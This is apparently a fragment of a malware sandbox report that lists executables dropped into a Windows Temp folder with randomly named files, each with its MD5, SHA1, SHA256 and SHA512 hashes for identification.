SHA1 395debe9c181606015b35c8b7dc21df98a4b1504
SHA256 d77e8682320dc332032c10689e44c7d2a339821e40892b1cb44be0a23358426d
SHA512 c0f424b3f1ce9491456a2e8ee08b12a4c1933e0d7c30f052c2ad3645defb54cc92d040169d04ea211696c8e9b7fd27faac9399f8e4cdbb8f70bbf6915cd56e2a

C:\Users\Admin\AppData\Local\Temp\IsoW.exe

MD5 af8bfa7aa0b4a318d1e82c209a9ce15a
SHA1 f12c9d08b6717f27be66a940dca65b461f31359c
SHA256 7ba04a203e15ca9212d00e6aa892fbdec102e2c840572b336cce9d9dd6038e6d
SHA512 dbed2f072cd4ea0c09b2b35fe4af854c68f6dff5cca38fa3e19121ea5e29662039e75919ab0c78a7a629892d5f99ac14c602fe5f44324703634d892c8ef87564

C:\Users\Admin\AppData\Local\Temp\iUMg.exe

MD5 6d6e168360ff7a5e595959c16939f8a0
SHA1 76e3df46d672fdfd171368b918919a891bccc6cc
SHA256 ee3e34ce6284c487be332ddfff7d7df21546a99345510f25319b811ba387eed1
SHA512 7088e0c48c546f7b0dac1170b8e5f5328aea55f8d5ab5c73f961d0cd5065f7db0a1c9939460b25fbb02486e0945e760dc2f1d2b9673dec51b565f31758a5fb80

C:\Users\Admin\AppData\Local\Temp\YIUQ.exe

MD5 1b3359363ae023cb27a1561a8bf239d2
SHA1 b44b157cb24a656190e51ca45356823a60b99ceb
SHA256 23e62995947d2597901eeaf677d7ef3f0778fa9e7c82b0c8b049ef7059302ae8
SHA512 4c31d47badf3191d94aac30af9f16a901e326d48334936c1b46d63c8c76661841a392979b3e900cbcf8b567a98041e73ee50e96c5c8c00c1a97af80c12f3e27a

C:\Users\Admin\AppData\Local\Temp\UgUW.exe

MD5 03c3b364e78cc11045feb117cbf2a789
SHA1 a20d52584334ec5afab077e822bbd7ab1cc6a4c7
SHA256 14c57d7def61d192280141c1c88be3e95a04403ea74e91742dd8dea5d8685f08
SHA512 0c1bc6a4dddb94127b7d9f06b9ac81e4f5831052cff6fab083974495f7dc0303b48a4c97a558a7b55cb26c5d2f271e8d4bb44887b6ebc7ba4e4c787b525fb45f

C:\Users\Admin\AppData\Local\Temp\wEgE.exe

MD5 dabb53b3e9309d6273924237a19faa80
SHA1 bfaff60977c4cf237016d1fc61739703684d58db
SHA256 21f4cea29d5b8c52ab9a8c3c75afe1d148a76aabf85498200913434104f89ccc
SHA512 148ffab7e07822ce65e90e86687e0d402fef66f8811d08ed8b1a4a5be740a23d3db164eab78ff35de9a2019bc7d5c9ceaf07d3cdfdb64e5dd0447ce4a1cb04ce